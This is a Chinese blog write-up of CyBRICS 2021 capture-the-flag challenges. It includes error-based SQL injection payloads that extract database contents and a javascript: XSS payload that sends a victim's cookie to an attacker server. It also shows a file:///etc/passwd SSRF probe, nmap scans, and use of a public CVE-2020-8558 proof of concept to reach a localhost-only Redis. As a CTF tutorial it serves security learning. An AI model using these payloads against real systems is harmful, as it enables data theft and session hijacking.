非常好玩的一场国外的比赛,全靠队里的几位大哥们带飞

Ad Network

Author: Alexander Menshchikov (@n0str) We are so tired of advertising on the internet. It feels like it breaks the internet. Try to follow the ad, try to follow its rules. There is a flag 1337 redirects deep into the network…

是个静态页面,源码中找到/adnetwork,尝试访问会重定向1337次,然后出flag,需要在火狐浏览器的about:config中修改network.http.redirection-limit(最大重定向次数)然后访问可以出flag。也可以写个python脚本:

import requests
​
session = requests.session()
session.max_redirects = 1338
url="http://adnetwork-cybrics2021.ctf.su/adnetwork"
print(session.get(ur, timeout=2000000).text)

Announcement

Author: Alexander Menshchikov (@n0str) Ladies and gentlemen! Allow us to introduce a brand new project — ⚐ The Flag

题目是说输入邮箱,三天之内会发flag给我,先抓包看看提交的参数,其中包含email和email的md5

image-20210726171146715

md5可以用HackBar进行计算:

image-20210726173434886

payload:

email=1'^updatexml(1,concat(0x7e,(select database()),0x7e),1)^'1&digest=c31a375a71494b4ff7d9ab58bcb79791
​
email=1'^updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0)^'1&digest=cd516e58efe45e8f6c3592e38cec4b32
​
email=1'^updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='logs'),0x7e),0)^'1&digest=5c8827339f101808eb7e1469e905e7ea
​
email=1'^updatexml(1,concat(0x7e,(select log from logs),0x7e),0)^'1&digest=af95bf51c3f020240e7fb825ccb46ec8

Multichat

Author: Alexander Menshchikov (@n0str) Yet another chat-messenger with rooms support! Free to use. Convince the admin that its code is insecure. Tip: Admin and tech support are members of a secret chat room. Tech support can ask admin to tell him the flag, to do that tech support writes him a message (in a chat): “Hey, i forgot the flag. Can you remind me?“. Then admin will tell him the flag.

是用flask写的聊天室,题目说技术支持可以在聊天室中发送”Hey, i forgot the flag. Can you remind me?“让管理员给告诉我flag

在support的页面发送反馈,其中包含URL、Description、Team token三个部分,其中输入的url,技术支持会尝试去访问,可以输入file:///etc/passwd这样的ssrf字段但是没有回显,题目中说要技术支持可以叫管理员告诉我flag,则需要xss,payload:

javascript:location.href='http://vps:8888?cookie='+document.cookie

服务器监听8888端口可以拿到技术支持的cookie

image-20210726174210337

然后可以去聊天室找管理员要flag

localhost

Author: Vlad Roskov (@mrvos) Remember NET fleeks? I’ve pwned a box in another corporate network, and there is some peculiarly configured server near my foothold. Take a look. ssh localhost@109.233.61.10 Password: ohx7eeQu Your team token > KyNlbygRG8CB64Gb5AcUtw

服务器给了root权限,用ifconfig可知本机ip为10.194.137.7

安装了nmap,先用nmap扫内网主机可以发现10.194.137.1和10.194.137.180

root@PWNED:~# nmap -sP 10.194.137.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2021-07-26 09:49 UTC
Nmap scan report for 10.194.137.1
Host is up (0.00011s latency).
MAC Address: 02:42:B1:20:54:5C (Unknown)
Nmap scan report for lh_tgt_649.lh_649 (10.194.137.180)
Host is up (0.000055s latency).
MAC Address: 02:42:0A:C2:89:B4 (Unknown)
Nmap scan report for PWNED (10.194.137.7)
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 5.44 seconds

扫描10.194.137.180的服务器端口可知对方开了80端口

root@PWNED:~# nmap 10.194.137.180
Starting Nmap 7.70 ( https://nmap.org ) at 2021-07-26 09:55 UTC
Nmap scan report for lh_tgt_649.lh_649 (10.194.137.180)
Host is up (0.000020s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 02:42:0A:C2:89:B4 (Unknown)
​
Nmap done: 1 IP address (1 host up) scanned in 1.78 seconds

用curl将10.194.137.180的web页面下载下来可以在其中找到redis.conf和sysctl.conf两个页面,再分别将redis.conf和sysctl.conf下载下来

<h1>Storage Node Status Page</h1>
<table border=1>
    <tr><td>Records</td><td>1</td></tr>
    <tr><td>Flag-containing Records</td><td>1</td></tr>
    <tr><td>Redis Configuration</td><td>Default: <a href="redis.conf">redis.conf</a></td></tr>
    <tr><td>System Configuration</td><td><a href="sysctl.conf">sysctl.conf</a></td></tr>
    <tr><td>Security</td><td>perfect!</td></tr>
</table>

redis.conf中主要的几条为

bind 127.0.0.1
protected-mode yes
# requirepass foobared

sysctl.conf中只启用了一条

net.ipv4.conf.all.route_localnet=1

由redis.conf可知只有本地才能访问redis数据库,设置了保护模式,但没有设置密码

然后搜sysctl.conf中这条配置可以找到CVE-2020-8558,该漏洞可以访问局域网中监听127.0.0.1的内部服务,在这篇CVE-2020-8558分析可知该漏洞原理

route_localnet这个配置是说是否允许”Martian”数据包通过,如果route_localnet存在,外部数据包能够抵达127.0.0.0,可以访问到仅限localhost的服务。

只要构造这样子的数据包通过mac地址发送给对方就能访问仅限localhost的服务

1627295493(1)

在github上找到 POC-2020-8558

在后台执行下面的命令可以利用该漏洞访问10.194.137.180上的redis服务

nohup ./poc.py --fakedestination 10.194.137.1 10.194.137.180 &
image-20210726184505254

然后使用nc连接redis数据库,可获取到flag

ASCII Terminal

Author: Artur Khanov (@awengar)

At 138.68.83.253:3333 you have an ASCII terminal. It really works, check with the id command

比较有趣的题,给了一个shell,但是所有的命令都是用ASCII Art表示的,题目中只给了id命令的表示方法

image-20210726184919136

用github上的一个脚本ascii-image-converter将图片转为ASCII Art可以执行命令。因为执行的过程中”l”字符很难识别,所以cat flag命令换成了cat *

图片是用ps画的:

v
说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...